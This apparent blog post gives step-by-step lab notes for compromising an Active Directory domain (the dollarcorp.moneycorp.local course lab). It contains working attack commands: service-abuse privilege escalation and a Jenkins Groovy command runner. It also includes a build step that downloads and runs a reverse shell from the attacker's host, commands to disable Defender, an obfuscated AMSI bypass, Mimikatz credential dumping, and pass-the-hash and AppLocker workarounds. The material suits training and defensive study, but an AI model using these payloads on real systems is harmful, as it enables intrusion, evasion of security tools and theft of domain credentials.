Our target is first escalate our local privs to local admin level. Then we will hunt for to check we have the local admin privs to which other machines. Then we will check on those machines, any domain admin sessions are available or not.
Unquoted service path check:
Get-WmiObject -class win32_service | Select-Object pathname
From powerup:
Get-ServiceUnquoted -Verbose
Get services where the current user can write to its binary path or change arguments to the binary:
Get-ModifiableServiceFile -Verbose
Get the services whose configuration current user can modify, if you are in server operator group then you can do this:
Get-ModifiableService -Verbose
Or we can run all the above checks from using powerup.ps1 script:
. .\PowerUp.ps1
Invoke-AllChecks
help Invoke-ServiceAbuse -Examples
Invoke-ServiceAbuse -Name AbyssWebServer -UserName dcorp\student15 (Here AbyssWebServer is the abuseable service name that you come to know after running Invoke-AllChecks command)
When you run the above command then below command gets executed:
net localgroup Administrators dcorp\student15 /add
You can check your username included in the local administrators group or not by the following command:
net localgroup Administrators
Now logoff then log back on. Then permissions will be applied to the user student15.
Ok now student15 has local admin rights on student15 machine.
Now student15 can hunt for other machines where student15 has local admin rights:
For that powerview.ps1 script is needed.
. .\C:\AD\Tools\PowerView.ps1
To find local admin access on other machines:
Find-LocalAdminAccess -Verbose
Say you found a server named dcorp-adminsrv.dollarcorp.moneycorp.local where student15 has local admin rights. Now how can you access that? Powershell Remoting can help. In server 2012 onwards this is enabled by default. But in windows you need to enable it and you need administrative privs to enable this.
Enable-PSRemoting
Test-WSMan (to check whether it is enabled or not)
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
When you run the above command then you will be entered to the dcorp-adminsrv.dollarcorp.moneycorp.local server directly with the permission of student15 user as student15 has local admin privs on that box so it will not ask you for password. It will take it from your current session.
Jenkins privs escalation:
Scenario - 1
If you install jenkins on a machine to escalate your privs to local admin, you must know the admin pass of jenkins while accessing jenkins. Username is jenkinsadmin. After accessing or entering on jenkins, go to the following url. The ip is jenkins instance ip.
http://172.16.3.11:8080/script
Here you can use a groovy script that can let you to execute your fav commands: (Again jenkins admin credentials required)
Here is the script:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[insert command here]'.execute() i.e. (Remove this line of code)
def proc = 'whoami or net localgroup Administrators dcorp\mahim.firoj /add'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Scenario - 2
Now lets say jenkins in installed on a remote machine; ip is 172.16.3.11:8080 and you are accessing jenkins from your student15 machine; ip is 172.16.100.15
If you know the admin credentials of jenkins user then you can leverage the above script and execute the command net localgroup Administrators dcorp\student15 /add to add your user to the jenkins machine.
But what if you don't know the credentials of jenkins admin user!!! You know only jenkins builduser credentials. So in this case our plan is we will download and execute a reverse shell on the jenkins machine and access that machine from our student15 machine once the reverse shell is successfully deployed. By doing this we will get access of a admin privileged user on that jenkins machine. Here the user name is ciadmin. Jenkins needs an admin privs user to run on.
From your student15 machine launch powercat script as netcat listener:
. .\C:\AD\Tools\powercat.ps1
powercat -lvp 443 -t 1000
On your student15 machine host a web server like hfs and load the reverse shell (Invoke-PowershellTcp.ps1) script.
Now from your student15 machine, access the jenkins instance. Login there using builduser credentials. Click on your project15. On the next page click on configure. The link should be like this:
http://172.16.3.11:8080/job/Project15/configure
On this above page, come to the Build section. Add build step > Execute windows batch command
Place the following command there: (you can disable the defender before running this command)
powershell iex (iwr http://172.16.100.15/Invoke-PowershellTcp.ps1);Invoke-PowershellTcp -Reverse -IPAddress 172.16.100.15 -Port 443
Save it then click Build now. It will execute on jenkins system and give us the reverse shell from student15 machine. If the script gets blocked then disable the defender and amsi on jenkins machine first.
Once the reverse shell is established then you will get a user named i.e. ciadmin on jenkins box (dcorp-ci) who is local admin. Jenkins requires local admin and system privs to run on.
Now to find on which machines ciadmin user has local admin access:
Find-LocalAdminAccess -Verbose
We find out that on dcorp-mgmt machine ciadmin user has local admin rights.
Now if you need to find a machine where your user has local admin rights plus on that machine domain admin has sessions then follow the next explanations. You can run the above command (Find-LocalAdminAccess -Verbose) to see where your current user has local admin rights. Or you can run Invoke-UserHunter cmdlets from powerview. Say you just got access to a machine where ciadmin is local admin. Now from here you need to run the commands.
Disable defender on dcorp-ci machine:
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Disable amsi on dcorp-ci machine:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Download a script or the powerview script from ciadmin machine:
iex (iwr http://172.16.100.15/Invoke-PowerView.ps1)
Run Invoke-UserHunter to find out domain admin session and local admin access:
Invoke-UserHunter
Invoke-UserHunter -CheckAccess (This command you should run)
If you have local admin access on a remote machine then there are two ways to check out that:
Accessing remote machine or checking remote access when you have local admin rights there:
Enter-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
or
Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Say on this dcorp-mgmt machine your current user ciadmin has local admin rights plus domain admin session is available. We need to dump the domain admin user ntlm hash. We can either use the above any of two commands or we can follow the below:
Assume you are in dcorp-ci machine where you have ciadmin access from a reverse shell from student15. Meaning from a reverse shell you are accessing dcorp-ci machine from student15 machine.
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Downloading invoke-mimikatz.ps1 script on dcorp-ci machine and execute in memory of dcorp-ci or we can send the script Invoke-Mimikatz.ps1 directly to dcorp-mgmt with session included and execute that on dcorp-mgmt's memory. So either we can execute that in dcorp-ci and send the function to dcorp-mgmt or load the script using dot sourcing or send the script to dcorp-mgmt:
iex (iwr http://172.16.100.15/Invoke-Mimikatz.ps1)
or go to that folder in dcorp-ci machine where mimikatz script is present.
. .\Invoke-Mimikatz.ps1
To check what functions are loaded in memory:
ls function:
Disable defender on dcorp-mgmt machine:
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeProtection $true} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -Session $sess
Now we will send the mimikatz function to the dcorp-mgmt machine as we load it in memory of dcorp-ci:
Invoke-Command -ScriptBlock{function:Invoke-Mimikatz} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -Session $sess
or
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess (If you use this command then no need to load mimikatz on dcorp-ci memory)
Enter-PSSession -Session $sess
Now you will be on dcorp-mgmt machine. Then run Invoke-Mimikatz command.
As soon as you enter the above command, mimikatz will be open, give command there:
sekurlsa::logonpasswords
Now you will get domain admin ntlm hash.
Exit from dcorp-mgmt, also exit from the dcorp-ci reverse shell.
From your student15 machine:
Disable defender, load Invoke-Mimikatz.ps1 using dot sourcing. Then run the below command. Its over pass the hash attack.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:<ntlm hash of svcadmin> /run:powershell.exe"'
Now a powershell new session will spawn up with the context of svcadmin but if you give whoami, it will say it is student15. So what is the way of checking?
Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
You will see its svcadmin now.
Now we will do the same using derivative local admin access:
Derivative local admin means when you have local admin rights on other machines. Say student15 has derivative local admin rights on dcorp-adminsrv server. So we will try to dump interesting hash of other local admin from dcorp-adminsrv. Then we will laterally move or pivot to see those local admins has any local admin access on any remote machine where domain admin also has sessions. Earlier we done this using ciadmin from dcorp-ci machine.
From student15 or studentadmin machine:
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Now the problem is if the dcorp-adminsrv has applocker policy enabled and because of that we cannot use powershell.exe, cmd.exe and also language mode set as restricted instead of full. So how can we check that?
Language mode checking:
$ExecutionContext.SessionState.LanguageMode
Applocker checking:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
From here we come to know that we can run powershell script from program files folder.
Disable defender on dcorp-adminsrv machine.
Now we will copy the modified version of mimikatz script from student15 machine to adminsrv machine. So from student15 machine:
Copy-Item .\Invoke_MimikatzEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
Copy-Item .\Invoke_Mimikatz.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
Now access adminsrv machine using powershell remoting and launch mimikatz from there:
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Go to the Program Files folder:
.\Invoke-MimikatzEx.ps1 (In this case we cannot load the module using import-module or dot sourcing method because language mode is set as constrained. We direct call the script by calling its function which is at the end of the script we just write the function as Invoke-Mimikatz. After the script execute we will see that lots of users password hashes here.)
sekurlsa::logonpasswords
From here you will get srvadmin user ntlm hash who is local admin on dcorp-adminsrv machine.
Now go to either student15 machine or from adminsrv machine, you need to run the below command, make sure you load mimikatz module:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<ntlm hash of srvadmin> /run:powershell.exe"'
A Powershell privilege session will spawn up under the context of srvadmin.
Load powerview there:
. .\C:\AD\Tools\PowerView.ps1
Find-LocalAdminAccess -Verbose
You find a machine dcorp-mgmt where srvadmin has local admin rights.
Now you need to check on any machine domain admin session is available along with srvadmin is local admin on that machine:
Invoke-UserHunter -AllChecks
You find out that dcorp-mgmt machine, srvadmin has local admin right and on that machine domain admin session is present.
Now access dcorp-mgmt:
Enter-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Bypass amsi there if needed disable defender also.
Download and load mimikatz in memory of dcorp-mgmt server:
iex (iwr http://172.16.100.15/Invoke-Mimikatz.ps1)
Invoke-Mimikatz
sekurlsa::logonpasswords
Avi
Comments
Post a Comment